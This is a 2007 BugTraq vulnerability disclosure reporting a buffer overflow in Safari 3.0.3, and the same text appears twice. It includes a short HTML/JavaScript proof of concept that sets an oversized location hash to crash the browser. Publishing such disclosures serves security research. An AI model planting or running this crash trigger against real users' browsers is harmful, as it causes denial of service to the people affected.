BugTraq
Back to list
|
Post reply
Safari 3.0.3 (522.15.5) Buffer overflow
Sep 07 2007 04:28PM
azizov itdefence ru
Azizov E. (azizov (at) itdefence (dot) ru [email concealed])
1. At processing of data, which has more than 65474 bytes in size, occurs buffer overflow.
POC:
<html>
<body>
<script>
var maxbuf = 65474;
buff = "A";
for (i=0;i<maxbuf;i++) { buff = buff+"A"; }
document.location.hash = buff+"BOW! ";
alert(document.location.hash);
</script>
</body>
</html>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
1. At processing of data, which has more than 65474 bytes in size, occurs buffer overflow.
POC:
<html>
<body>
<script>
var maxbuf = 65474;
buff = "A";
for (i=0;i<maxbuf;i++) { buff = buff+"A"; }
document.location.hash = buff+"BOW! ";
alert(document.location.hash);
</script>
</body>
</html>
[ reply ]